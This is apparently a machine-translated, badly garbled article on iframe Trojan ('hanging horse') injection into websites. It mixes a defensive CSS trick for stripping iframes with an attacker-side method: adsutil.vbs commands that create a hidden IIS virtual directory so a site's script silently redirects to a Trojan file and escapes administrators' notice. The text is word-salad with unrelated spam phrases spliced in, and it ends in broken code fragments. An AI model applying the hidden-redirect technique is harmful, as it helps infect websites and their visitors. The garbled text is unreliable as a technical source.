Server pages linked apt horse

Common way to hang horse:
1. Web applying is vulnerable, later the invasion via the web to modify the source real reason horse hung horse (frame, js and other forms), can be resolved by the patch vulnerabilities;
2. Using bugs get webshell, and then provide the right to get system prerogatives, the use of tools to achieve Trojan
3. system privileges after the invasion, this time in iis loading malicious components to access all sites with malicious code when they are so client Trojan is executed in its use of
4. to use all 80 ports Arp spoofing the content of communications theory is modified if the poisoning is the same machine among the LAN,
the machine with antivirus software can not find any results, the site source code did not achieve any changes that have linked to horse
Wu's friend said Luo:
is probable to be added to cancel the code, did not hang asp Trojan horse to find out, the simplest edition is to search massive 55KB of *. as * in the file name, search out the files one by one, it was discovered garbled file is the Trojan document.

line of code to solve the iframe Trojan (Server-side injection the customer ARP injection, etc.) linked to a line of code to solve iframe horse (including server-side injection, injection, etc. consumer ARP)
Original article: linr@cncert.net Please reprint retain the copyright message
deem maximum of my friends are iframe Trojan is a martyr of a friend's site has been injected into the N back to iframe, mood can be imagined. ARP aggressions and immediately, into the iframe is cozy, equitable inside the LAN are always beneath menace, hey, what morals.
Linger had classical forum too recently: have contacted Linger, some gratitude, but more of a doubt, today to talk about the principle and makes it:
IE Only - routinely only feared iframe IE hung like horses, so Linger on Take IE surgery.
Before perusing this article, we first look at the expression;
IE5 and later versions patronize in CSS expression, CSS properties and JavaScript used to associate the script, where the CSS properties can be inherent properties of elements , can also be custom attributes. CSS properties that can be backward a JavaScript expression, CSS Javascript expression value of the property equal to the results of the implementation. Expression can be directly referenced in the element's own properties and methods you can use other browser objects. This expression is like the element functions as a membership.
numerous of my friends kas long asCSS can describe the appearance of a visual marker. For example: p color: red, the page where all the p tags in the text color will turn ruddy; iframe is not a tag? Linger start writing code with it, Oh:
iframe {... here describe the advent of prose CSS code;};
think approximately where the stuff to prevent iframe is the best way is to download what? To the gist, that is, cut off the iframe in the request, the request is to cut the quick erasure of iframe object. How to achieve it, the above described expression is not it? expression can execute JS script Kazakhstan. Syntax is as follows 2 kinds:
brand inherent CSS property name: expression (JS expression);
or custom attribute name: wording (JS expression);
where we choose the second, This code should be roughly
iframe v: expression (JS expression);
afterward question is how to break always the pages in one iframe object; use JS to fulfill the conviction is this: namely in the iframe apply address into a vacant sheet (about: blank), then the iframe object from the DOM (Document Object Model) tin be cut off to remove all the iframe in the apply. DOM node usage to clear more, I am here with outerHTML this property right. CSS code is as follows:
iframe v: expression (this.src = 'about: blank', this.outerHTML ='');
Description: Linger in front of the v word is defined in a CSS property of their , where representatives of all of this will be to describe the appearance of an iframe object in the navel of a comma with representatives of two code execution, no execution array of priority, this is a lusty certify Oh. about: blank on behalf of the blank page, we all know. outerHTML properties of the DOM object contains its own HTML code, but innerHTML is a DOM object (not including itself) which contains HTML code.
linear, the code written, let's test it I believe there is no effect.
First, create a new page, insert the CSS code above (or in your existing CSS code to add the above phrase):

then insert a few pages in the IFRAME code, they are imagined to be linked Trojan page. Code is as usual:
Of course be best to realize his JS functions! As enough secret! Administrators ambition find the page now there is no alteration to the properties of IIs in the family did not see the alteration, and even host the file on the www are not whichever changes, he will be quite depressed now! Oh! If he just go back to the previous site export and revitalization is also no path to change the page back! IIs so much he can not file a look at a property it! By the way, ask a question that you prefer to redirect the file must be the last reference to his interpretation of html tags, otherwise there is not efficacy! For instance, a [img]1.jpg[/img] 1.jpg redirect you to our horse page is needless, for Trojan horses are not as Html page analysis, yet for to the img tag in the pictures,PULSERA BLANCA CON ARGENTINA! I think to use the script label is still frame, as Css, I also can use, but I have not base the use of methods! Do not know my analysis was right, salute counsel ah!
let us continue it! Suppose your administrator whether severe enough or diligent enough, he found you mm2.js upon rigged, he would retrieve from his quondam IIs inside! Our imagine has minced! Is there a more shrewd approach? Which allows administrators IIs can not find it? The question is yeah! We must remember that long ago that the IIS configuration vulnerabilities, you can create an hidden virtual directories, then set up inside the back door! We can also use borrowed Oh! Look at the IIS configuration vulnerabilities principle is not a physical directory that the virtual directory, so it will not apparent in the IIs, then you can do tiny cheats of this directory! Here we first create an invisible virtual directories, if you called home embody folder under the js file,PULSERA CAMUFLAJE CON LOGO XB, we set the include directory now! This can be achieved using the IIS script, which is in IIs adsutil.vbs script installation directory such as C: Inetpub AdminScripts under,PULSERA BLANCA CON PORTUGAL, is to control IIS action of a script, we use the command as follows:

cscript adsutil.vbs Create W3SVC/1/Root/www/include Then create a catalogue in the label of the virtual catalogue phoned mm2.js, Oh! Actually create a virtual directory namely accustom. And additional special characters:

cscript adsutil.vbs Create W3SVC/1/Root/www/include/mm2.js there is a include/mm2.js virtual directory it! Think of what? Home is where the call with the file name has been the Oh! We continue down to do!

cscript adsutil.vbs set W3SVC/1/Root/www/include/mm2.js/httpredirect Change mm2.js virtual directory redirect feature in Figure 3. Note that one of the W3SVC/1/Root/www / representatives IIs web server under the www first virtual directory, we do not know if you can use adsutil.vbs enum parameter to query the need to change their website, other operations can open adsutil . vbs script to help look,Extreme Balance! After doing so would set a virtual directory redirect feature, now try to call home include/mm2.js, Guess returns mm2.js our mm1.js content or the content? The answer is mm1.js, Figure 4, and the physical file still exists! This is maybe the IIS feature it! He first handles user requests, and virtual directory takes precedence over the physical file! Then we went inside to see if there is not a IIS virtual directory include it! Figure 5, there is no bar! Oh! So that we successfully ignore the access restrictions and the administrator of the test! Our horse will be linked to the other side of the site, and unless the other side we must hide or delete redo IIs virtual directory, otherwise he is very complicated to remove our Trojan!

article is very simple, the key is the IIS script commands and some comprehending of IIs, this approach is appropriate to be linked to the horse after horse hung administrator rights, opposition those who but diligent administrator is still very useful! We later found that the site problems remember to use this script to see there is not a problem under the Oh! Or simply to back up the IIS settings it! Problems also restore the settings IIs, Oh!


2. the entire server was linked to horse page source does not generate code
horse hung nearly all sites on one server or even open a Web page HTML pages have emerged


<iframe src=
<script language=60 * 60 * 1000);
file.cookie = ; / body>